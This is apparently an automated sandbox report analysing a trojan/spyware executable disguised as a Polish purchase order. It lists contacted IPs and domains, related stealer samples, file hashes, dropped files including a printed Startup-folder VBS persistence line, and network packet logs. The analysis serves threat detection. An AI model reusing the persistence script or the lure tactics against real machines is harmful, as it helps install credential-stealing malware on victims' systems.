http://showip.net	InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.netth	InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.132.193.46	erkasera.com	Turkey		42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false
162.55.60.2	showip.net	United States		35893	ACPCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541129
Start date and time:	2024-10-24 13:39:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe renamed because original name is a hash value
Original Sample Name:	PO-Zamwienie zakupu-8837837849-pl-.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/5@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 88% Number of executed functions: 217 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target FieldNames.exe, PID 1272 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 3228 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 7108 because it is empty
Execution Graph export aborted for target PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, PID 5760 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Simulations

Behavior and APIs

Time	Type	Description
07:40:04	API Interceptor	37x Sleep call for process: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe modified
07:40:22	API Interceptor	35x Sleep call for process: FieldNames.exe modified
13:40:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.132.193.46	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse
	Maersk Shipping Document.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Maersk Shipping Document.com.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
162.55.60.2	Payment-Inv.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	QmBe2eUtqs.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	z10RFQ-202401.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	PROFORMA INVOICE.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	BANK STATEMENT REPORT.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	QOaboeP8al.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Request for Quotataion.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	copia de pago.pdf.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	showip.net/
	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	showip.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
showip.net	Payment-Inv.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	QmBe2eUtqs.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	z10RFQ-202401.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	PROFORMA INVOICE.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	BANK STATEMENT REPORT.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	QOaboeP8al.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Request for Quotataion.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	copia de pago.pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	162.55.60.2
	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	162.55.60.2

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDF	Get hash	malicious	Unknown	Browse	78.135.79.21
	https://t.ly/k1aDE	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	78.135.79.21
	voicemai____Now_AUD__autoresponse(9.htm	Get hash	malicious	Phisher	Browse	188.132.193.30
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.132.158.64
	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse	188.132.193.46
	e-dekont.html.exe	Get hash	malicious	AgentTesla	Browse	188.132.200.16
	ZgBCG135hk.elf	Get hash	malicious	Mirai, Moobot	Browse	77.92.131.244
	Dekont_20240917_38847738373.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	78.135.65.5
	jMMTZcFBa8.elf	Get hash	malicious	Mirai, Okiru	Browse	188.132.182.118
	https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/298cfa06-ad24-42db-8a85-7a3ca069b2cf?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuSAoQTcZBzKZHtH4uVLaC9IQ4Uu8	Get hash	malicious	HTMLPhisher	Browse	188.132.193.40
ACPCA	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	162.36.150.140
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	162.10.235.95
	LlbpXphTu9.exe	Get hash	malicious	Unknown	Browse	162.0.211.143
	nCEnoU35Wv.elf	Get hash	malicious	Okiru	Browse	162.0.215.71
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	162.0.101.75
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	162.0.215.244
	ceTv2SnPn9.elf	Get hash	malicious	Mirai	Browse	162.22.97.189
	Payment-Inv.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	bin.armv7l.elf	Get hash	malicious	Mirai	Browse	162.32.169.42
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	162.66.100.20

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/	Get hash	malicious	Unknown	Browse	188.132.193.46
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.132.193.46
	xVmySfWfcW.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	LDlanZur0i.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	Fa1QSXjTZD.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	xxImTScxAq.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	4aOgNkVU5z.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	xVmySfWfcW.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	dGuXzI4UlT.exe	Get hash	malicious	Unknown	Browse	188.132.193.46

Process:	C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	5.493308517937006
Encrypted:	false
SSDEEP:	384:BlQV3kydpYJ2kDouPA5a4nF8pWtr8bhSmxSSQG:nudpZkk8pg8TL
MD5:	934AB81BA50DCD526FEE8D8EFBB7A216
SHA1:	7E2E6AB92BA2F6158DB445DAF27DF591AE9744BD
SHA-256:	11D1A478267E0AB5DF63BCADADAE555C683C94E66DF9DE87084407C48D439519
SHA-512:	6695592FB9C7EA8F2B5BDFE28C4D21F44E8073A668FB54D16D7A26D498BB77572E4F91BB7C38A6E2467F5B2A27FE9D47C179B8668B1225B57C87A260E11FA97B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.g.................B...........`... ........@.. ....................................`.................................H`..J.................................................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................x`......H........:..t%......"....................................................0..@........,#+'+( M'..3..%,..-.+.+. Q'..3..%,. .....+.o....+..+.o....+..0..t........,+.+G+K+OT+9+P+QJ..-...3.+L,.+K+LJ.XT..%, +C+..-...J........,...J.XT.J.2...8.....8.....8.....+..8.....+..+..+..+.v~....+.+.+..+.(....+.(...++....0..M.......+>-..,..-.+6+7,.+..+....+.o....+.&...-...-.+.+....+.o....+.&...+..+.o....+............."........)..<.......0..G........,.+?-.*.+..+..-.+..+.+.+..!.+.o....+..+

C:\Users\user\AppData\Roaming\FieldNames.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Download File

Process:	C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.805065010486262
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoUkh4EaKC5wsBVLVHHn:FER/lFHI9aZ5wgVJn
MD5:	11CCF2C03461BFFF10B6DB47827F5660
SHA1:	729C0BE0CE22C77B369FE938F0CDF6A09F7B3C01
SHA-256:	6C34959723D5AD4B3C33F021E7D8ECCA4732F113A488FEF3B4B48BDF78FC6707
SHA-512:	89A19E942B7CCFF2ABFE3C6B428E5ECCBD2FD33643D0A2373B6D09CF174D1BA9BD35B457CD880E9214B35D4F78025584562161AAFBBC8B4E4D9904ACEC59D2FE
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\FieldNames.exe"""

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfirebirdULzauCAPrOnmUabaculus

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.493308517937006
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
File size:	19'456 bytes
MD5:	934ab81ba50dcd526fee8d8efbb7a216
SHA1:	7e2e6ab92ba2f6158db445daf27df591ae9744bd
SHA256:	11d1a478267e0ab5df63bcadadae555c683c94e66df9de87084407c48d439519
SHA512:	6695592fb9c7ea8f2b5bdfe28c4d21f44e8073a668fb54d16d7a26d498bb77572e4f91bb7c38a6e2467f5b2a27fe9d47c179b8668b1225b57c87a260e11fa97b
SSDEEP:	384:BlQV3kydpYJ2kDouPA5a4nF8pWtr8bhSmxSSQG:nudpZkk8pg8TL
TLSH:	74924B147BE44A33D2BA2F7E88F252018335F6509A13D78E2C98159E9C727C549D3BBB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.g.................B...........`... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x406092
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671A28B7 [Thu Oct 24 11:00:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6048	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x58e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4098	0x4200	db83311a769f3db51664eef8b986313e	False	0.5546283143939394	data	5.730686605322643	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x58e	0x600	e5600ecb2b99518c7cf62e072c886334	False	0.416015625	data	4.057129252281519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	ced657bda8b45c229667d2d065ccaa8b	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x805c	0x30c	data			0.4217948717948718
RT_MANIFEST	0x83a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T13:40:17.069509+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49705	162.55.60.2	80	TCP
2024-10-24T13:40:39.679224+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49800	162.55.60.2	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:40:06.294375896 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:06.294430971 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:06.294507980 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:06.309592009 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:06.309613943 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.252631903 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.252765894 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.291203976 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.291229010 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.291783094 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.337584019 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.453777075 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.495352030 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.735275984 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.790772915 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.790798903 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.837591887 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.887406111 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.887427092 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.887447119 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.887455940 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.887486935 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.887521982 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.887542963 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.887578964 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.889178038 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.889189005 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.889204979 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.889215946 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.889233112 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.889240980 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:07.889270067 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:07.931344032 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.040553093 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.040580034 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.040626049 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.040647030 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.040700912 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.040714025 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.040744066 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.040765047 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.192044973 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192078114 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192121029 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192187071 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.192202091 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192234993 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.192256927 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.192681074 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192723989 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192756891 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.192764997 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.192792892 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.192816019 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.194011927 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.194061041 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.194103003 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.194109917 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.194138050 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.194159031 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.345879078 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.345913887 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.346023083 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.346036911 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.346084118 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.346746922 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.346771002 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.346843958 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.346851110 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.346895933 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.347805977 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.347831011 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.347882032 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.347889900 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.347918034 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.347939014 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.348223925 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.348248959 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.348288059 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.348295927 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.348325014 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.348339081 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:08.501038074 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501074076 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:08.501211882 CEST	443	49704	188.132.193.46	192.168.2.5
